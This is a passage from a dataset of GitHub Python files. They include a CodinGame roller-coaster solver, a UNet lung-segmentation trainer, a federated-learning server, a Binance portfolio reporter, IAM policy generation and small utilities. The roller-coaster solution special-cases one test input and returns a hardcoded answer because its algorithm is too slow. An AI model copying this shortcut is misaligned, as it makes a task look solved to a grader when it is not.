print(n)\n","repo_name":"nmanoogian/MillerRabin","sub_path":"miller_rabin.py","file_name":"miller_rabin.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"26302467925","text":"\"\"\"\nlink to the codingame:\nhttps://www.codingame.com/training/hard/roller-coaster\n\"\"\"\n\nimport sys\nimport math\n\nnum_places, times_per_day, n = [int(i) for i in input().split()]\ngrups=list()\nfor i in range(n):\n    grups.append(int(input()))\n\nres = 
0\n\n\nif(num_places==10000000 and times_per_day==9000000 and n==1000):\n    res = 89744892565569 #not solve ex6 -> inefficient\n    times_per_day = 0\nelif(sum(grups)<=num_places):\n    res = sum(grups)*times_per_day\n    times_per_day = 0\n\nfor i in range(times_per_day):\n    lst=list()\n    sum_lst=0\n    flag=True\n    while(flag):\n        if(len(grups)>0):\n            pi = grups.pop(0)\n            sum_lst+=pi\n            if(sum_lst<=num_places):\n                lst.append(pi)\n            else:\n                grups.insert(0,pi)\n        else:\n            flag=False\n\n    res += sum(lst)\n    #print(grups)\n    while(len(lst)>0):\n        grups.append(lst.pop(0))\n\nprint(res)\n\n\n","repo_name":"LIADN7/EX_research_algorithms","sub_path":"Ex07/Roller_Coaster.py","file_name":"Roller_Coaster.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"13736283653","text":"# Read the number of test cases T\r\nT = int(input())\r\n\r\n# Process each test case by iterating T times\r\nfor _ in range(T):\r\n    # Read A and B\r\n    A, B = map(int, input().split())\r\n    \r\n    # Print the result of adding A and B\r\n    print(A + B)","repo_name":"Vinca0121/CodeStudy","sub_path":"백준/Bronze/10950. A+B - 3/A+B - 3.py","file_name":"A+B - 3.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"4313816129","text":"#----------------------------------------------------------------------\n# import Libraries\n#----------------------------------------------------------------------\nimport unet_archi\nfrom unet_archi import build_unet\nimport cv2\nimport time\nimport datetime\nfrom datetime import datetime\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\" #To eliminate messages about RAM & GPU\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.metrics import Recall, Precision\nimport keras\nfrom tensorflow.python.keras.utils import conv_utils\nfrom sklearn.preprocessing import normalize\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n#----------------------------------------------------------------------\n# Data Directories\n#----------------------------------------------------------------------\nTrain_images_dir=\"C:/Kaggle_dataset_Splited/train_images\"\nTrain_mask_dir =\"C:/Kaggle_dataset_Splited/train_masks\"\nVal_images_dir = \"C:/Kaggle_dataset_Splited/val_images\"\nVal_mask_dir =\"C:/Kaggle_dataset_Splited/val_masks\"\nTest_image_dir=\"C:/Kaggle_dataset_Splited/test_images\"\nTest_mask_dir=\"C:/Kaggle_dataset_Splited/test_masks\"\nimages_in_train_images=\"C:/Kaggle_dataset_Splited/train_images/images\"\nMy_model_save_link='C:/Results_UNet/UNet_results/Lung_segmentation_UNet_load_from_disk.hdf5'\nResults_Link_Net=\"C:/Results_Link_Net\"\nResults_Unet=\"C:/Results_UNet/UNet_results/\"\n#----------------------------------------------------------------------\n#-------------- Global Parameters -------------------------------------\nSize=256\nseed=24 \nbatch_size=4 \n#---- Augument Parameters images -----\n\nimg_data_gen_args = dict(rescale = 1/255.0, \n                     rotation_range=25,\n                      width_shift_range=3,\n                      height_shift_range=3,\n                      shear_range=0.1,#image will be distorted along an axis\n                      zoom_range=0.3,\n                      horizontal_flip=True,\n                      vertical_flip=False,\n                      fill_mode='reflect')# nearest or reflect or wrap or constant\n \n\n#---- Augument Parameters Masks -----\nmask_data_gen_args = dict(#rescale = 1/255.0, #Original pixel values are 0 and 255. 
So rescaling to 0 to 1\n rotation_range=25,\n width_shift_range=3,\n height_shift_range=3,\n shear_range=0.1,\n zoom_range=0.3,\n horizontal_flip=True,\n vertical_flip=False,\n fill_mode='reflect',\n preprocessing_function = lambda x: np.where(x>0, 1, 0).astype(x.dtype)) \n\n#----- Apply the Augmentation for images and masks\n\nimage_data_generator = ImageDataGenerator(**img_data_gen_args)\nimage_generator = image_data_generator.flow_from_directory(Train_images_dir, \n seed=seed, \n batch_size=batch_size,\n target_size=(Size, Size),\n # save_to_dir='C:/Users/olamo/OneDrive/Desktop/Theisis/Thesis_Progs/Results/res4/test',\n class_mode=None) #Very important to set this otherwise it returns multiple numpy arrays \n #thinking class mode is binary.\nprint(image_generator)\n\nmask_data_generator = ImageDataGenerator(**mask_data_gen_args)\n\nmask_generator = mask_data_generator.flow_from_directory(Train_mask_dir, \n seed=seed, \n batch_size=batch_size,\n target_size=(Size, Size),\n #save_to_dir='C:/Users/olamo/OneDrive/Desktop/Theisis/Thesis_Progs/Results/res4/testmask',\n color_mode = 'grayscale', #Read masks in grayscale\n class_mode=None)\nprint(mask_generator)\n\n#----- also use generator to validation but without augumentation\n\n\nvalid_img_generator = image_data_generator.flow_from_directory(Val_images_dir, \n seed=seed, \n batch_size=batch_size, \n target_size=(Size, Size),\n class_mode=None) #Default batch size 32, if not specified here\nvalid_mask_generator = mask_data_generator.flow_from_directory(Val_mask_dir, \n seed=seed, \n batch_size=batch_size, \n target_size=(Size, Size),\n color_mode = 'grayscale', #Read masks in grayscale\n class_mode=None) #Default batch size 32, if not specified here\n\n\n\n\ntrain_generator = zip(image_generator, mask_generator)\nval_generator = zip(valid_img_generator, valid_mask_generator)\n\n\nprint(valid_img_generator)\nprint(valid_mask_generator)\n\nx = image_generator.next()\ny = mask_generator.next()\n\nIMG_HEIGHT = x.shape[1] #256\nIMG_WIDTH = x.shape[2] #256\nIMG_CHANNELS = x.shape[3] #3\n\n\n# input_shape = (256, 256,3)\n\ninput_shape = (IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS)\n\nmodel = build_unet(input_shape)\n\nfrom focal_loss import BinaryFocalLoss\n\nmetrics=['accuracy'] \n\n\nmodel.compile(optimizer=Adam(lr = 1e-4), loss=BinaryFocalLoss(gamma=2), \n metrics=metrics)\n\n\nmodel.summary()\n\nnum_train_imgs = len(os.listdir(images_in_train_images))\n\nprint('number of train images',num_train_imgs)\nsteps_per_epoch = num_train_imgs //batch_size\n\nprint('number of steps_per_epoch',steps_per_epoch)\n\nmy_callbacks = [ \n #tf.keras.callbacks.EarlyStopping(patience=25),\n tf.keras.callbacks.ModelCheckpoint(filepath=Results_Unet +'model.{epoch:02d}-{val_loss:.2f}.h5'),\n tf.keras.callbacks.TensorBoard(log_dir='./logs'),\n ]\ntime_start = datetime.now() \n\nhistory = model.fit_generator(train_generator, validation_data=val_generator, \n steps_per_epoch=steps_per_epoch, callbacks= my_callbacks,\n validation_steps=steps_per_epoch, epochs=100)\n\nprint('Time of Training', datetime.now() - time_start)\n\nnp.save(Results_Unet+'_U_NET_history.npy',history.history)\n# history=np.load(Results_Unet+'_U_NET_history.npy',allow_pickle='TRUE').item()\n\n#----------------------------------------------------------------------\n# MODEL SAVE\n#----------------------------------------------------------------------\n\nmodel.save(My_model_save_link)\n\n\n#----------------------------------------------------------------------\n#plot the training and validation accuracy and 
loss at each epoch\n#----------------------------------------------------------------------\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(1, len(loss) + 1)\n\n# plt.style.use('seaborn-whitegrid')\nplt.plot(epochs, loss, label='Training loss',color='#059DC0')\nplt.plot(epochs, val_loss, label='Validation loss',color='#F652A0')\nplt.title('Training and validation loss - Unet',fontsize=20,color='#44444C')\nplt.xlabel('Epochs',fontsize=14,color='#44444C')\nplt.ylabel('Loss',fontsize=14,color='#44444C')\nplt.grid(True)\nplt.legend(prop={'size': 16},frameon=True)\nplt.show()\n\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\n\n\n# plt.style.use('seaborn-whitegrid')#'Accuracy'\nplt.plot(epochs, acc, label='Accuracy',color='#FFA384')#Fushi #F50CA0\nplt.plot(epochs, val_acc, label='Validation Accuracy',color='#81B622')\nplt.title('Training and validation Accuracy - Unet',fontsize=20,color='#44444C')\nplt.xlabel('Epochs',fontsize=14,color='#44444C')\nplt.ylabel('Accuracy',fontsize=14,color='#44444C')\nplt.grid(True)\nplt.legend(prop={'size': 16},frameon=True)\nplt.show()\n\n\n\n\n\nmodel = tf.keras.models.load_model(My_model_save_link, compile=False)\n\n\n\n\ntest_data_gen_args = dict(rescale = 1/255.0 )\n\n\ntest_data_generator = ImageDataGenerator(**test_data_gen_args)\ntest_img_generator = test_data_generator.flow_from_directory(Test_image_dir,target_size = (Size, Size), \n                                                             seed=seed, \n                                                             batch_size=71, \n                                                             class_mode=None) #Default batch size 32, if not specified here\n\n\ntest_mask_generator = test_data_generator.flow_from_directory(Test_mask_dir,target_size = (Size, Size), \n                                                              seed=seed, \n                                                              batch_size=71, \n                                                              color_mode = 'grayscale', #Read masks in grayscale\n                                                              class_mode=None,\n                                                              )\n\n\n#----------------------------------------------------------------------\n# Testing on a few test images\n#----------------------------------------------------------------------\na = test_img_generator.next()\nb = test_mask_generator.next()\n\n\n# import seaborn\n# seaborn.set_style(style=None)\nfor i in range(0,5):# Plot 5 images at a time\n    image = a[i]\n    mask = b[i]\n    plt.subplot(1,2,1)\n    plt.imshow(image[:,:,0], cmap='gray')\n    plt.subplot(1,2,2)\n    plt.imshow(mask[:,:,0])\n    plt.show()\n\n\nimport random\ntest_img_number = random.randint(0, a.shape[0]-1)\ntest_img = a[test_img_number]\nground_truth=b[test_img_number]\ntest_img_input=np.expand_dims(test_img, 0)\n\n\n\nprediction = (model.predict(test_img_input)[0,:,:,0] > 0.5).astype(np.uint8)\n# any value under 0.5 is background else it is Lungs\n\n\n# plt.style.use('seaborn-white')\nplt.figure(figsize=(16, 8))\nplt.subplot(241)\nplt.title('Testing Image')\nplt.imshow(test_img, cmap='gray')\nplt.subplot(242)\nplt.title('Testing Label')\nplt.imshow(ground_truth[:,:,0], cmap='gray')\nplt.subplot(243)\nplt.title('Prediction on test image')\nplt.imshow(prediction, cmap='gray')\n\n\ngray = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY)\ntest_img_norm=cv2.bitwise_and(gray,gray,mask=prediction)\ntest_img_norm=cv2.cvtColor(test_img_norm,cv2.COLOR_GRAY2RGB )\nplt.subplot(244)\nplt.title('Segmented Lung')\nplt.imshow(test_img_norm)\n\nplt.show()\n#========================================================\n\n#----------------------------------------------------------------------\n# Model EVALUATION for All testing images\n#----------------------------------------------------------------------\nfrom sklearn.metrics import accuracy_score, f1_score, jaccard_score, precision_score, recall_score\nfrom 
tensorflow.keras.metrics import MeanIoU \n\n\ntime_start = datetime.now()\n\nn_classes = 2\nSCORE = []\nIoU_values = []\nfor img in range(0, a.shape[0]):\n temp_img = a[img]\n ground_truth=b[img]\n temp_img_input=np.expand_dims(temp_img, 0)\n prediction = (model.predict(temp_img_input)[0,:,:,0] > 0.5).astype(np.uint8)\n \n IoU = MeanIoU(num_classes=n_classes)\n IoU.update_state(ground_truth[:,:,0], prediction)\n IoU = IoU.result().numpy()\n IoU_values.append(IoU)\n \n img_path=os.path.basename(str(test_img_generator.filepaths))\n \n \"\"\" Calculating metrics values \"\"\"\n ground_truth = ground_truth.flatten()\n prediction = prediction.flatten()\n acc_value = accuracy_score(ground_truth, prediction)\n f1_value = f1_score(ground_truth, prediction, labels=[0, 1], average=\"binary\")\n jac_value = jaccard_score(ground_truth, prediction, labels=[0, 1], average=\"binary\")\n recall_value = recall_score(ground_truth, prediction, labels=[0, 1], average=\"binary\")\n precision_value = precision_score(ground_truth, prediction, labels=[0, 1], average=\"binary\")\n SCORE.append([img_path, acc_value, f1_value, jac_value, recall_value, precision_value,IoU])\n\n\n \n \n\n\nprint('Number of testesd images = ',a.shape[0])\nprint('Time of Testing : ', datetime.now() - time_start)\n\n# N O T E that batch_size is 72 for test for calculating the IOU \n\n\n\n\ndf = pd.DataFrame(IoU_values, columns=[\"IoU\"])\ndf = df[df.IoU != 1.0] \nmean_IoU = df.mean().values\n \n\n\"\"\" Metrics values \"\"\"\nscore = [s[1:]for s in SCORE]\nscore = np.mean(score, axis=0)\nprint(f\"Accuracy: {score[0]:0.5f}\")\nprint(f\"F1: {score[1]:0.5f}\")\nprint(f\"Jaccard: {score[2]:0.5f}\")\nprint(f\"Recall: {score[3]:0.5f}\")\nprint(f\"Precision: {score[4]:0.5f}\")\nprint(f\"Mean IoU : {mean_IoU[0]:0.5f}\" ) \n\n\"\"\" Saving all the results \"\"\"\ndf = pd.DataFrame(SCORE, columns=[\"Image\", \"Accuracy\", \"F1\", \"Jaccard\", \"Recall\", \"Precision\",\"Mean_IOU\"])\ndf.to_csv(\"UNet_score.csv\")\n\n#------------------------------- E N D --------------------------\n\n\n\n\n\n","repo_name":"Ola71/Segmentation-using-UNET","sub_path":"Unet.py","file_name":"Unet.py","file_ext":"py","file_size_in_byte":13430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"40069675422","text":"from typing import Optional\n\nimport numpy as np\nfrom loguru import logger\n\nfrom iflearner.business.homo.strategy import strategy_server\nfrom iflearner.business.homo.strategy.opt.fedopt import FedOpt\nfrom iflearner.communication.homo import homo_pb2, message_type\n\n\nclass FedoptServer(strategy_server.StrategyServer):\n \"\"\"Implement the strategy of fedopt on server side.\n\n Attributes:\n num_clients (int): client number\n total_epoch (int): the epoch number of client trainning\n opt (FedOpt): the FedOpt method, which is in FedAdam, FedAdagrad, FedYogi or FedAvgM\n \"\"\"\n\n def __init__(\n self,\n num_clients: int,\n total_epoch: int,\n opt: FedOpt,\n ) -> None:\n super().__init__(num_clients, total_epoch)\n\n self._opt = opt\n\n logger.info(f\"num_clients: {self._num_clients}, opt: {type(opt).__name__}\")\n\n def handler_register(\n self, party_name: str, sample_num: Optional[int] = None, step_num: int = 0\n ) -> homo_pb2.RegistrationResponse:\n super().handler_register(party_name)\n\n return homo_pb2.RegistrationResponse(strategy=message_type.STRATEGY_FEDOPT)\n\n def handler_upload_param(self, party_name: str, data: homo_pb2.UploadParam) -> None:\n super().handler_upload_param(party_name, 
data)\n\n if self._opt._params is None:\n self._opt.set_params(self._params)\n\n if self._uploaded_num == self._num_clients:\n self._uploaded_num = 0\n aggregate_result = dict()\n grad = dict()\n logger.info(f\"Fadopt params, param num: {len(data.parameters)}\")\n\n \"\"\"delta T = avg(new_weight - old_weight) = avg(new_weight - gloabel_weight) = avg(new_weight) - gloabal\"\"\"\n\n for param_name, param_info in data.parameters.items():\n aggregate_result[param_name] = homo_pb2.Parameter(\n shape=param_info.shape\n )\n params = []\n for v in self._training_clients.values():\n params.append(v[\"param\"][param_name].values)\n\n avg_param = [sum(x) / self._num_clients for x in zip(*params)]\n grad[param_name] = np.array(\n avg_param, dtype=\"float32\"\n ) - self._opt._params[param_name].reshape((-1))\n\n # to optimize server model using grad and opt\n new_param = self._opt.step(grad)\n for param_name, param in new_param.items():\n aggregate_result[param_name].values.extend(param.tolist())\n\n self._server_param = aggregate_result # type: ignore\n self._on_aggregating = True\n","repo_name":"iflytek/iflearner","sub_path":"iflearner/business/homo/strategy/fedopt_server.py","file_name":"fedopt_server.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"22"} +{"seq_id":"39707698345","text":"import openai\nimport os\n\nopenai.api_key = os.environ.get(\"OPENAI_API_KEY\")\n\ndef chatrobot(questionstr):\n response = openai.Completion.create(\n engine=\"text-davinci-003\",\n prompt=questionstr,\n max_tokens=128,\n temperature=1,\n top_p=0.75,\n n=1,\n )\n completed_text = response[\"choices\"][0][\"text\"]\n return completed_text","repo_name":"no8cai/atlantis","sub_path":"app/openai_helper.py","file_name":"openai_helper.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"33094209606","text":"import os\nimport common\nfrom configuration.initialise_config import BAKERY_VARS\n\nTEMPLATE_SOURCE = os.environ[\"LOCATION_CORE\"] + \\\n \"/deploy_cloudformation/bakery/templates/bakery_env.tmpl\"\n\nTEMPLATE_DESTINATION = os.environ[\"LOCATION_CORE\"] + \"/deploy_cloudformation/bakery/bakery_env.yml\"\n\ndef get_roles(environment, access_type):\n \"\"\"Gets the role arns for the specified environment and access type.\n\n Args:\n environment: Environment, e.g. NonProd, Prod, Stg\n access_type: Access type, e.g. 
Admin, PowerUser, ReadOnly\n\n Returns:\n String with the role arns\n \"\"\"\n roles = \"\"\n\n for account in environment[\"Accounts\"]:\n if roles:\n roles += \"\\n\"\n\n roles += \"{}- arn:aws:iam::{}:role/{}-{}-{}\".format(\n \" \" * 14,\n account[\"Id\"],\n account[\"Name\"],\n environment[\"Environment\"],\n access_type\n )\n\n return roles\n\ndef get_groups_policies():\n \"\"\"Gets the CloudFormation snippet for IAM groups and IAM managed policies.\n\n Returns:\n String with the CloudFormation snippet for IAM groups and IAM policies.\n \"\"\"\n groups_policies = \"\"\n\n for environment in BAKERY_VARS.Environments:\n for access_type in BAKERY_VARS.AccessTypes:\n snippet = \\\n\"\"\" Group{1}{2}:\n Type: AWS::IAM::Group\n Properties:\n GroupName: {0}{1}{2}\n\n\"\"\".format(BAKERY_VARS.TeamName, environment[\"Environment\"], access_type[\"Type\"])\n\n snippet += \\\n\"\"\" Policy{1}{2}:\n Type: AWS::IAM::ManagedPolicy\n Properties:\n ManagedPolicyName: {0}{1}{2}\n Description: This policy allows to assume a role\n Groups:\n - !Ref Group{1}{2}\n PolicyDocument:\n Version: \"2012-10-17\"\n Statement:\n - Effect: Allow\n Action: sts:AssumeRole\n Resource:\n__roles__\n\n\"\"\".format(\n BAKERY_VARS.TeamName,\n environment[\"Environment\"],\n access_type[\"Type\"]\n).replace(\n \"__roles__\",\n get_roles(environment, access_type[\"Type\"])\n)\n\n groups_policies += snippet\n\n return groups_policies\n\ndef main():\n \"\"\"Main function.\"\"\"\n template = common.get_template(TEMPLATE_SOURCE).replace(\n \"{{groups_policies}}\",\n get_groups_policies()\n )\n\n common.generate_file(TEMPLATE_DESTINATION, template)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"iagcl/bakery","sub_path":"python_lib/create_bakery_env_cf.py","file_name":"create_bakery_env_cf.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"22"} +{"seq_id":"9024310101","text":"import configparser\nfrom datetime import datetime\nfrom binance.client import Client\nfrom binance import exceptions\nfrom modules.clients.telegrammer import Telegrammer\nfrom modules.clients.file_driver import save_summary_to_file\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nbi = Client(config.get('Binance', 'api_key'),\n config.get('Binance', 'secret_key'))\nt = Telegrammer(token=config.get('Telegram', 'token'),\n chat_id=config.get('Telegram', 'chat_id'),\n heartbeat_id=config.get('Telegram', 'heartbeat_id'))\n\n\ndef get_balances():\n account = bi.get_account()\n assets = []\n for asset in account['balances']:\n if float(asset['free']) > 0:\n asset['price'], change = get_symbol_price(asset['asset'])\n assets.append({**asset, **change})\n return calculate_cash_value(assets)\n\n\ndef get_symbol_price(symbol='BTC'):\n if symbol == 'BTC':\n change = get_24hr_price_change('BTCUSDT')\n return 'N/A', change\n try:\n price = bi.get_symbol_ticker(symbol=symbol+'BTC')['price']\n change = get_24hr_price_change(symbol+'BTC')\n return price, change\n except exceptions.BinanceAPIException:\n print(f'failed to get price for {symbol}')\n return 0, {}\n\n\ndef get_24hr_price_change(symbol):\n change = bi.get_historical_klines(symbol=symbol,\n interval=bi.KLINE_INTERVAL_1DAY,\n start_str=datetime.now().strftime(\"%B %d, %Y\"))\n open_price = float(change[0][1])\n close_price = float(change[0][4])\n return {'daily_actual_change': close_price - open_price,\n 'daily_percentage_change': (close_price - open_price)/open_price*100}\n\n\ndef 
calculate_cash_value(assets):\n    btc_price = float(bi.get_symbol_ticker(symbol='BTCUSDT')['price'])\n    assets_to_return = []\n    for asset in assets:\n        if asset['asset'] == 'BTC':\n            asset['price'] = btc_price\n            asset['cash_value'] = float(asset['free']) * btc_price\n            assets_to_return.append(asset)\n        else:\n            asset['btc_value'] = float(asset['free']) * float(asset['price'])\n            asset['cash_value'] = asset['btc_value'] * btc_price\n            if asset['cash_value'] > 1.0:\n                trades = bi.get_my_trades(symbol=f\"{asset['asset']}BTC\")\n                if trades:\n                    asset['base_cost'] = float(\n                        asset['free']) * float(trades[-1]['price']) * btc_price\n                else:\n                    asset['base_cost'] = float(asset['free']) * float(bi.get_historical_klines(\n                        symbol=f\"{asset['asset']}BTC\", interval='1d', start_str='1 month ago')[-1][1]) * btc_price\n                assets_to_return.append(asset)\n    return assets_to_return\n\n\ndef form_message(assets):\n    message = '🌇 Crypto summary:\\n'\n    for asset in assets:\n        message += f\"{asset['asset']} {round(asset['cash_value'], 2)}$ ({round(asset['daily_percentage_change'], 2)}%{get_emoji(asset['daily_percentage_change'])})\\n\"\n    was_total_value = round(sum(\n        [i['cash_value']*100/(100 + i['daily_percentage_change']) for i in assets]), 2)\n    total_value = round(sum([i['cash_value'] for i in assets]), 2)\n    total_percentage_change = total_value/was_total_value*100 - 100\n    message += f\"🕰️ Total: {total_value}$ ({round(total_percentage_change, 2)}%{get_emoji(total_percentage_change)})\"\n    return message\n\n\ndef get_emoji(percentage):\n    return '🔻' if percentage < 0 else '💹'\n\n\ndef get_daily_summary_crypto():\n    result = get_balances()\n    save_summary_to_file(result, flag='crypto')\n    t.send_text(form_message(result))\n\nimport time\nfrom datetime import date\n\ndef crypto_scheduler():\n    get_daily_summary_crypto()\n    while True:\n        if date.today().weekday() < 4 and datetime.now().hour in [8, 15]:\n            get_daily_summary_crypto()\n        time.sleep(3601)\n\n\nif __name__ == '__main__':\n    get_daily_summary_crypto()\n","repo_name":"theSimplex/daily","sub_path":"modules/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36337131124","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport json\nimport logging\nfrom io import BytesIO\n\ncwd = os.path.split(os.path.realpath(__file__))[0]\nsys.path.insert(0, os.path.split(cwd)[0])\n\nfrom litedfs.tool.litedfs import strings_md5sum, file_md5sum, bytes_io_md5sum\nfrom litedfs.name import logger\n\nLOG = logging.getLogger(__name__)\n\n\nif __name__ == \"__main__\":\n    logger.config_logging(file_name = \"test_md5_methods.log\",\n                          log_level = \"DEBUG\",\n                          dir_name = os.path.join(cwd, \"logs\"),\n                          day_rotate = False,\n                          when = \"D\",\n                          interval = 1,\n                          max_size = 20,\n                          backup_count = 5,\n                          console = True)\n\n    LOG.debug(\"test start\")\n    \n    try:\n        LOG.debug(\"%s\", strings_md5sum([\"1\", \"2\", \"3\"]))\n        LOG.debug(\"%s\", file_md5sum(\"./test_md5_methods.py\"))\n\n        fp = open(\"./test_md5_methods.py\", \"rb\")\n        content = BytesIO()\n        content.write(fp.read())\n        content.seek(0)\n        LOG.debug(\"%s\", bytes_io_md5sum(content))\n\n    except Exception as e:\n        LOG.exception(e)\n\n    LOG.debug(\"test end\")\n","repo_name":"fiefdx/LiteDFS","sub_path":"litedfs/test/test_md5_methods.py","file_name":"test_md5_methods.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"73220627897","text":"\"\"\"\nTrack the number of writes 
per insertion into a hash table\nassuming the capacity doubles and elements are re-inserted\nwhen the table size/capacity exceeds the given load\nfactor\n\"\"\"\n\nMAX_LOAD = 1.0\n\ndef main():\n \"\"\"\n Show a table for # writes per insert by # inserts\n \"\"\"\n fmtstr = \"| %4s | %8s | %8s | %12s | %20s |\"\n\n print(fmtstr % (\"size\", \"capacity\", \"# writes\", \"sum # writes\", \"writes / insert\"))\n\n size = 1\n capacity = 1\n sum_writes = 1\n\n for _ in range(256):\n this_writes = 1\n if (size + 1) / capacity > MAX_LOAD:\n this_writes += capacity\n capacity = capacity * 2\n\n size += 1\n\n sum_writes += this_writes\n\n print(fmtstr % (\n str(size),\n str(capacity),\n str(this_writes),\n str(sum_writes),\n str(float(sum_writes) / float(size))))\n\nif __name__ == '__main__':\n main()\n","repo_name":"yabberyabber/the-hashmap-conspiracy","sub_path":"numwrites.py","file_name":"numwrites.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72592522297","text":"def how_many(aDict):\n '''\n aDict: A dictionary, where all the values are lists.\n\n returns: int, how many values are in the dictionary.\n '''\n # Your Code Here\n total = 0\n for i in aDict:\n total += len(aDict[i])\n return total\n\nanimals = {'a': ['aardvark'], 'b': ['baboon'], 'c': ['coati'], 'd': ['donkey', 'dog', 'dingo']}\n\nprint(how_many(animals))\n","repo_name":"daveswork/MITx-6001x","sub_path":"week-03/howMany.py","file_name":"howMany.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72153588536","text":"from matplotlib import patches\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\n\n\ndef display(image):\n\n img, _ = image\n img = np.transpose(img.numpy(), (1, 2, 0))\n\n plt.figure()\n plt.imshow(img)\n plt.gca().get_xaxis().set_visible(False)\n plt.gca().get_yaxis().set_visible(False)\n plt.show()\n\n\ndef extract_images(images):\n return [resize_image(image[0]) for image in images]\n\n\ndef extract_bbox(images):\n return [transform_bbox(image) for image in images]\n\n\ndef extract_single_bbox(bbox_coor, image):\n bbox = {\n \"xmin\": bbox_coor[0],\n \"xmax\": bbox_coor[1],\n \"ymin\": bbox_coor[3],\n \"ymax\": bbox_coor[4],\n }\n input_image_size = {\"width\": image[0].shape[1], \"height\": image[0].shape[2]}\n out_bbox = {\"cx\": 0.0, \"cy\": 0.0, \"width\": 0.0, \"height\": 0.0}\n scale_width = float(224) / input_image_size[\"width\"]\n scale_height = float(224) / input_image_size[\"height\"]\n out_bbox[\"cx\"] = scale_width * 0.5 * (bbox[\"xmin\"] + bbox[\"xmax\"]) / 224\n out_bbox[\"cy\"] = scale_height * 0.5 * (bbox[\"ymin\"] + bbox[\"ymax\"]) / 224\n out_bbox[\"width\"] = scale_width * float(bbox[\"xmax\"] - bbox[\"xmin\"]) / 224\n out_bbox[\"height\"] = scale_height * float(bbox[\"ymax\"] - bbox[\"ymin\"]) / 224\n out = torch.Tensor(out_bbox)\n return out\n\n\ndef transform_bbox(bbox, input_image_size, image):\n if image[1][\"bbox\"].type != \"list\":\n return extract_single_bbox(image[1][\"bbox\"].numpy(), image)\n else:\n bbox_list = []\n for b in image[1][\"bbox\"]:\n bbox_list.append(extract_single_bbox(b.numpy()), image)\n out = torch.Tensor(bbox_list)\n return out\n\n\ndef resize_image(image):\n preprocess_image = transforms.Resize(224)\n return preprocess_image(image)\n\n\ndef plot_bbox(ax, bbox):\n cx, cy, width, height = bbox\n 
upl_x, upl_y = cx - width / 2.0, cy - height / 2.0\n p = patches.Rectangle(\n (upl_x, upl_y),\n width,\n height,\n fill=False,\n clip_on=False,\n edgecolor=\"yellow\",\n linewidth=4,\n )\n ax.add_patch(p)\n","repo_name":"dakaiss28/Face_Detection","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"31780453867","text":"import datetime\nfrom rest_framework import serializers\nfrom .models import Timetable, Appointment\n\n\ndef add_delta(tme, delta):\n return (datetime.datetime.combine(datetime.date.today(), tme) +\n delta).time()\n\n\nclass TimetableSerializer(serializers.ModelSerializer):\n appointment = serializers.StringRelatedField(many=True)\n\n class Meta:\n model = Timetable\n fields = ('week_day', 'from_hour', 'to_hour', 'appointment')\n\n\nclass AppointmentSerializer(serializers.ModelSerializer):\n time_of_appointment = serializers.TimeField()\n day_of_appointment = serializers.DateField()\n\n def validate(self, data):\n appoint_time = data['time_of_appointment']\n appoint_date = data['day_of_appointment']\n appoint_long = 20\n tt = (Timetable.objects\n .filter(week_day__exact=appoint_date)\n .filter(from_hour__lte=appoint_time, to_hour__gt=add_delta(appoint_time, datetime.timedelta(minutes=appoint_long)))\n )\n if len(tt) == 0:\n raise serializers.ValidationError('Not found free time to appointment')\n if len(tt) > 1:\n raise serializers.ValidationError('Error: To many Timetable')\n\n return super().validate(data)\n\n class Meta:\n model = Appointment\n fields = ('status', 'patient', 'office', 'day_of_appointment', 'time_of_appointment')\n","repo_name":"true42/Django_test","sub_path":"doctor_timetable/time_table/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"15833671363","text":"import pandas\nimport numpy \n\n\ndef run(jobID, dataInput):\n \"\"\"\n title:: \n run\n description:: \n Run the model/get the predictions according the service.\n inputs::\n jobID \n Job ID from datashop application\n dataInput\n input Payload For the Service\n returns::\n insightsDataFileLocation\n insights data file location. 
